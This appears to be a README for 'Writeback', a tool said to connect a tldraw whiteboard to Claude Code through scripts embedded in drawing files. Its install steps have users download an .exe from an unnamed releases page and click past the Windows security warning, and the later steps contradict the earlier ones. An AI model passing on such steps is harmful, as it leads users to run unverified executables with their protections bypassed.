Writeback transforms your whiteboard into a smart assistant. You draw sketches or write questions on your canvas. The tool provides answers directly on your screen. It handles math, text, and diagrams without moving or hiding your original work.
This tool relies on your existing account for Claude Code. It does not require separate keys or servers. It adds a small script to your drawing files. This script connects your canvas to the AI. When you pause, the tool reads your request and creates the answer. The app asks for your permission before it runs any script. Your files remain local on your computer at all times.
- A Windows computer running Windows 10 or newer.
- The tldraw offline desktop application.
- An active Claude Code user profile.
- An active internet connection to process your requests with the AI.
Follow these steps to set up the software on your Windows machine:
- Visit the official releases page.
- Look for the latest version under the "Assets" section.
- Click the file ending in
.exeto start the download. - Open the downloaded file. Windows may show a security window. Click "More info" and then "Run anyway" if you trust the software.
- Install the tldraw offline desktop app if you do not have it yet.
- Open the file you just downloaded inside the tldraw interface.
Once you open the software, treat it like a normal whiteboard. Use your mouse or a stylus to draw shapes or write text.
- Math: Draw a shape, label the sides, and add a question mark. The software fills in the missing value nearby.
- Questions: Write a question on the screen. The answer appears below it after a few seconds.
- Diagrams: Ask for a diagram by typing a request. The software renders the illustration on your canvas.
Your original drawings stay in place while the software draws the AI response next to your work. Nothing disappears. Every element remains editable.
Your drawing files stay on your machine. The software uses your local Claude Code setup to talk to the AI. It does not send your data to outside servers beyond the standard AI connection required for responses. You control the scripts. If you do not want an answer, simply do not click "Run" when the app asks for consent.
If the software does not respond, verify your Claude Code login. Ensure your internet connection stays active. If the screen remains blank, check if the script permissions got blocked. Check the options menu inside the tldraw app to ensure scripts show as enabled for this specific file. Restart the application if the canvas fails to update.
